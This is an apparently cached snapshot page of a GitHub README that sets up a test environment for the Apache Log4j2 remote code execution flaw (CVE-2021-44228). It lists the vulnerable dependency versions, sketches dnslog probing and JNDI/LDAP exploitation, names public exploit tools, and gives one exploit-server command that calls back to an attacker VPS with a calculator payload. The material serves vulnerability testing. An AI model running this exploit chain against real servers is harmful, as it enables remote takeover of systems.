Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j 代码问题漏洞

Source
https://github.com/1in9e/Apache-Log4j2-RCE
Associated Vulnerability
Title:Apache Log4j 代码问题漏洞 (CVE-2021-44228)
Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
Description
Apache Log4j2 RCE( CVE-2021-44228)验证环境
Readme
# Apache Log4j2 RCE 验证环境
> Since from 2021.12.09

## Some Ref
https://mp.weixin.qq.com/s/yck74F9p9QhVw_3ykzVoSg

## 搭建环境
maven引入相关包及存在漏洞版本范围
```xml
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>
```
![0](images/0.png)

## 检查
#### 利用dnslog探测是否使用
![0](images/2.png)

#### ldap结合jndi利用RCE
jdk版本有关,JDK 11.0.1、8u191、7u201、6u211之后需要手动设置trustURLCodebase为true
> 关于此详细学习可参考 https://blog.0kami.cn/2020/03/01/java/jndi-with-ldap/

利用方式,可结合jndi注入工具,例如[JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit) 、[fastjson_rce_tool](https://github.com/wyzxxz/fastjson_rce_tool) 、 [JNDIExploit](https://github.com/feihong-cs/JNDIExploit) 
> 还可结合工具实现多种已公开回显方式、内存马注入方式

```bash
# 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a /System/Applications/Calculator.app"  -A your_vps_ip
```
![1](images/1.png)

#### Web
> TODO

![3](images/3.png)

#### About
https://github.com/apache/logging-log4j2/tags
File Snapshot

 [4.0K]  /data/pocs/a6133d09d13e413eb975d455500e56be78e67963
├── [4.0K]  images
│   ├── [259K]  0.png
│   ├── [678K]  1.png
│   ├── [452K]  2.png
│   └── [445K]  3.png
├── [5.9K]  Logdemo.iml
├── [2.8K]  pom.xml
├── [1.4K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  com
        │       └── [4.0K]  example
        │           └── [4.0K]  logdemo
        │               ├── [2.1K]  Log4j2Web.java
        │               └── [ 420]  Log4jTest.java
        └── [4.0K]  resources
            ├── [ 913]  log4j2.xml
            └── [4.0K]  META-INF
                └── [ 326]  beans.xml

9 directories, 11 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.